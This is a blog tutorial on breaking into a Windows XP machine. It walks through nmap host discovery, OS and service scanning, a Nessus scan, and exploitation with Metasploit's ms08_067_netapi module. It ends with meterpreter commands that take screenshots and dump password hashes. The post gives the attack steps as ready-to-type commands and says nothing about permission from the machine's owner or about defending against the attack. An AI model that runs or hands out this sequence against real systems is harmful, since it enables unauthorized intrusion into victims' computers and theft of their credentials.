The following tutorial is based in a realistic scenario and I'm gonna show you how to identify,scan and exploit a Windows XP OS.
The victim is running Windows XP OS and the attacker Linux Mint(Maya 13) OS.
So, the first step is to identify the alive hosts in the attacking network. An alive host is a host which responds to an ICMP echo request(Ping). For further information about ICMP request, just have a look here( http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol ).
Let's say that the networks IP is 10.50.97.0/24 . Now, to find alive hosts you have to launch nmap ( http://nmap.org/ ) and performing a Ping scan by typing the following command:
$ sudo nmap -v 10.50.97.0/24
The output should be something like this:
The above command will start Nmap tool and perform an ping and port scan from host 10.50.97.0 to 10.50.97.255 .If you want to perform a ping scan just change -v with -sn .
After finding the alive hosts we have to identify their Operating Systems. To do this just type:
$ sudo nmap -O [alive host's ip]
With the above command you will ask for Operating System detection (-O). My output looks like this:
After having a quick check in the output we can simply learn the target's OS.
After identifying the host we have to scan it for open ports,services,vulnerabilities.You can check for open ports and services by typing :
$ sudo nmap -sV [target's ip].
The above command probes open ports to determine service information.
Now, after gathering useful information we are gonna perform a vulnerability scan for identifying open ports, more infos and common vulnerabilities which we are gonna try to exploit later.
To do this, we have to launch a vulnerability scan with Nessus tool.
Wait a couple of minutes.After vulnerability scan been completed check the report.
OK! Here are the infos we have:
1) Vulnerable Host's Ip
2) Target's Operating System
3) Services Informations
4) Open ports , other information , vulnerabilities
The next step, is to run the Metasploit Framework. With Metasploit we will exploit the vulnerabilities of the target.
So, after launching Metasploit we should select the exploit we need. (Check your nessus report for finding your exploit name). In this case, I'm gonna use the "ms08_067" exploit. To do this type in metasploit field :
"use exploit/windows/smb/ms08_067_netapi"
'use' is the command which says to metasploit which exploit to use.
Now, type "show options" to see your exploit's options.Fill the empty fields,such as "RHOST" ,"RPORT" etc. Like the following example:
After completing the above step it's time to run our exploit. To do this, just type "exploit" and wait for the exploit to run.
The following picture is an example of my metasploit session.
Once meterpreter session is opened you can easily get some screenshots of the target machine by typing
"screenshot" , show some passwords by typing "hashdump" and other cool thinks!
Have your coffee and enjoy your meterpreter session!
Thanks,
Nikos Danopoulos
No comments:
Post a Comment